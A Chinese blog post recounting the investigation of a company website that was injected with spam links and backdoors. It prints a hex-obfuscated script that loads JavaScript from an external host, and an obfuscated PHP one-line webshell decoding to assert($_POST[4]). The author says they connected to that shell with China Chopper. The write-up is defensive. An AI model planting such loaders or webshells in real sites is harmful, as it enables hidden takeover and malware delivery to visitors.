• 欢迎来到八本那年博客,很高兴可以在对的年纪遇见对的你!
  • 因主题导致QQ登录的小伙伴在评论中显示默认头像,请去个人中心重新上传头像即可。

公司网站被挂马,自查漏洞方法

网站技巧 barben 5年前 (2019-04-20) 2287次浏览 0个评论

昨天经理又大驾光临了一趟,说公司网站被挂马…

既然不懂渗透,那我只能瞎摸呗…

看看首页文件中都有些什么?

惨不忍睹的三大标签:

还有一段js代码,复制到百度上发现这段代码基本上都是出现在被黑的网站上,然而我也不知道是什么东西…

<script type="text/javascript">
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x73\x66\x73\x66\x64\x73\x66\x2e\x6f\x73\x73\x2d\x63\x6e\x2d\x68\x6f\x6e\x67\x6b\x6f\x6e\x67\x2e\x61\x6c\x69\x79\x75\x6e\x63\x73\x2e\x63\x6f\x6d\x2f\x31\x39\x30\x30\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
</script>

16进制的编码,大概转换unicode码之后得到的结果就是:
马马虎虎(明明就是一目十行)的看了下,可能是在页面上输出这个js文件的返回值。

还在页面的最底部发现了一堆链接到php文件的东西

然后就看了看这些php文件是何方神圣…

却发现这些文件都一模一样,只是名字不同而已。大概又看了一下这段php代码,意思应该是读取传给自定义方法的Reads那个地址里面的内容并输出。

接下来我就很果断的打开了这个地址,但是由于公司网站被黑的时间太久才发现,这个地址也很不凑巧的404了

通过日志来查

知道了网页哪里被挂了黑链,就得查查是怎么被拿到权限的。
首先FTP密码猜解不可能,公司所有网站的FTP密码都是随机生成大小写数字混合的。
然后再下载了网站的所有访问日志,但是由于被黑的时间太长了已经没办法找到。
接下来又想着去后台查操作日志,但是又发现后台是自己公司的前辈写的,根本就没有那么完善,更别提操作日志这种事情了。
真 · 无解

安全狗了解一下?

既然自己没这个本事查,那就用软件查查后门在哪。
快来了解一下网站安全狗:http://free.safedog.cn/website_safedog.html
(@安全狗 广告费记得要结一下)

把网站的所有文件都下载后一扫描,果然发现了很多马子。

由于以前自己也用一句话木马玩过简单的入侵,所以就很随意的点开了第二条扫描结果,然而真就确认了眼神!!!

接下来打开了这个一句话木马文件,整个文件只有两行代码暴露着,其它全都是被注释掉的代码(就为了伪装成一个织梦CMS文件也是厉害)。

把这两段代码复制到百度,看看这是啥玩意?

$a=range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a[113]).chr($a[115]);
$b(${chr($a[94]).chr($a[79]).chr($a[78]).chr($a[82]).chr($a[83])}[chr($a[51])]);

果然不失所望,确实是一句话。百度后知道了这一句话木马的密码是4。

那好,既然知道是一句话了,就利用以前会的一些鸡毛蒜皮,加上传说的中国菜刀试试看吧?

果然连上而且得到了网站的所有权限…

未完待续

关于渗透有太多东西要说了,还是做好网站的安全防护最重要,对于查出来的安全漏洞和木马文件各位小伙伴要及时删除,不让坏蜀黍有可乘之机!!!
至于公司网站的漏洞…emmmmm….还在找~


八本那年博客,我们一直都在
如作者未注明既为原创文章,转载请注明本文链接及出处
公司网站被挂马,自查漏洞方法 - https://www.barben.cn/skill/435.html
喜欢 (8)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体

在八本那年评论需要带上你的昵称和邮箱哦!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址